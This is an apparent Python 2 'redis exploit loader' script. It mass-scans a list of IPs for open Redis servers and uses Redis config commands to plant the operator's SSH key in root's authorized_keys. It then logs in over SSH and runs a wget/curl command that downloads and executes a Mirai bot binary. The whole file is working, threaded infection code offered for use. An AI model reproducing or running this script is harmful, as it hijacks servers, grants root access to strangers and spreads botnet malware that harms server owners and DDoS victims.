#!/usr/bin/python
# -*- coding: utf-8 -*-
# redis exploit loader modified by Freak
# must type ssh-keygen -t rsa -C \"acid_creative\" as root to generate key to hijack redis
# phat hax enjoy
import random
import socket
import threading
import socket
import sys
import paramiko
import time
procIP = []
suc = 0
command_to_send = \
    'cd /tmp; wget http://0.0.0.0/bins/mirai.x86 -O || curl http://0.0.0.0/bins/mirai.x86 -O; chmod 777 mirai.x86; ./mirai.x86'


def getLinesList(fileLoc):
    buf = []
    with file(fileLoc, 'r') as f:
        for line in f:
            buf.append(line)
    return buf


def writeSuc(file_name, content):
    try:
        if content not in file(file_name, 'r'):
            with file(file_name, 'a+') as f:
                f.write(content)
    except Exception, e:
        pass


def main():
    if len(sys.argv) < 3:
        sys.exit('Usage: <ip_list> <ip_output_file>\n')

global running
running = 0

def worker(ipOutput, keyFile, ip):
    try:
        global running
        running += 1
        global suc
        global procIP
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            sock.setblocking(False)
            sock.settimeout(3)
            sock.connect((ip, 6379))
            sock.settimeout(None)
            sock.send('config set dir /root/.ssh/\n')
            buf = sock.recv(4)
            if buf.strip() == '+OK':
                print '[+] Good IP ' + ip
                sock.send('set qwe "\\n\\n' + keyFile
                          + '''\\n\\n\\n"
config set dbfilename "authorized_keys"
save
''')
                file_h = open('good.txt', 'a')
                file_h.write(ip + '\n')
                file_h.close()
                suc += 1
                sock.close()  # ssh auto infector
                ssh_port = 22
                user = 'root'
                ssh = paramiko.Transport((ip, ssh_port))
                auth_key = \
                    paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa'
                        )
                ssh.connect(username=user, pkey=auth_key)
                session = ssh.open_channel()
                session.exec_command(command_to_send)
                time.sleep(10)
                ssh.close()
            else:
                sock.close()
            print '[%s/%s] Bad IP --> %s' % (str(suc),
                    str(len(ipList)), ip)
        except Exception, e:
            print "[%s/%s] Bad IP (can't connect at all) --> %s" \
                % (str(suc), str(len(ipList)), ip)
    except Exception, e:
        print e
    running -= 1

ipList = getLinesList(sys.argv[1])
ipOutput = sys.argv[2]
keyFile = file('/root/.ssh/id_rsa.pub', 'r').read().strip()
threads = []
for ip in ipList:
    t = threading.Thread(target=worker, args=(ipOutput, keyFile, ip))
    threads.append(t)
for x in threads:
    while running > 512:
        time.sleep(1)
    x.start()
for x in threads:
    x.join()



if __name__ == '__main__':
    main()